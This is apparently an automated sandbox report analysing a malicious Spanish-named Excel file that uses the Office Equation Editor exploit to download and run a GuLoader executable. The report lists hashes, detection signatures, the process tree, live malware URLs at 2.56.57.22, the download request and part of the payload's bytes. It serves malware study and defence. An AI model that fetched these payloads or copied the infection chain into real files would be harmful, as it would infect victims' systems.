Edit tour

Windows Analysis Report
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Overview

General Information

Sample Name:	#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls
Analysis ID:	635062
MD5:	3fed4357a9a31f6d784d90e0e2828cef
SHA1:	b10fe00a3142c331aa805a78b5e01e9fa73d9c6b
SHA256:	bc03e79179795e31ba88934475f0746f25a7382a157ab005a54cae03b83c797d
Tags:	xlsx
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Machine Learning detection for sample

Shellcode detected

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

PE file does not import any functions

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Binary contains a suspicious time stamp

PE file contains more sections than normal

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 3004 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1112 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

venxajlddf.exe (PID: 2944 cmdline: C:\Users\user\AppData\Roaming\venxajlddf.exe MD5: 2A384E15F8133C8B9ECEFA4DA1D96CEE)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin\u000b\u05c8"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sheet1.xml	INDICATOR_XML_LegacyDrawing_AutoLoad_Document	detects AutoLoad documents using LegacyDrawing	ditekSHen	0x291:$s1: <legacyDrawing r:id=" 0x2b9:$s2: <oleObject progId=" 0x30b:$s3: autoLoad="true"

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 2.56.57.22, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1112, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1112, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin\u000b\u05c8"}

Multi AV Scanner detection for submitted file

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Virustotal: Detection: 54%	Perma Link
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Metadefender: Detection: 22%	Perma Link
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	ReversingLabs: Detection: 58%

Antivirus / Scanner detection for submitted sample

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Avira: detected

Antivirus detection for URL or domain

Source: http://2.56.57.22/droidttrre.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://2.56.57.22/droidttrre.exe

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	Metadefender: Detection: 31%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Metadefender: Detection: 31%	Perma Link
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	ReversingLabs: Detection: 38%

Machine Learning detection for sample

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Joe Sandbox ML: detected

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 2.56.57.22 Port: 80

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: System.IO.FileSystem.Watcher.ni.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Watcher\net6.0-windows-Release\System.IO.FileSystem.Watcher.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D74
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040699E FindFirstFileW,FindClose,	4_2_0040699E
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D05C4 URLDownloadToFileW,	2_2_036D05C4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0557 LoadLibraryW,URLDownloadToFileW,ExitProcess,	2_2_036D0557
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D060F WinExec,ExitProcess,	2_2_036D060F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0571 URLDownloadToFileW,	2_2_036D0571
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04D7 LoadLibraryW,URLDownloadToFileW,	2_2_036D04D7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D062F ExitProcess,	2_2_036D062F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04A2 ExitProcess,	2_2_036D04A2

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 2.56.57.22:80

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 2.56.57.22:80

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://2.56.57.22/yendexoriginwithoutfilter_rctcon218.bin

Source: Joe Sandbox View

ASN Name: GBTCLOUDUS GBTCLOUDUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 24 May 2022 18:13:44 GMTAccept-Ranges: bytesETag: "abe39719a6fd81:0"Server: Microsoft-IIS/10.0Date: Fri, 27 May 2022 10:02:27 GMTContent-Length: 1449584Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 00 40 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 04 00 00 5b e9 16 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 b0 05 00 68 2d 02 00 00 00 00 00 00 00 00 00 50 ff 15 00 20 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 03 02 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 03 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 2d 02 00 00 b0 05 00 00 2e 02 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /droidttrre.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 2.56.57.22Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22

Source: EQNEDT32.EXE, 00000002.00000002.975278743.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comz equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.975278743.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exe
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exeP
Source: EQNEDT32.EXE, 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exej
Source: EQNEDT32.EXE, 00000002.00000002.975219877.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/droidttrre.exeooC:
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: folder-publicshare.png.4.dr	String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: venxajlddf.exe, 00000004.00000000.963495241.000000000040A000.00000008.00000001.01000000.00000004.sdmp, venxajlddf.exe, 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://s2.symcb.com0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com02
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://subca.ocsp-certum.com05
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://sv.symcd.com0&
Source: avutil-54.dll.4.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
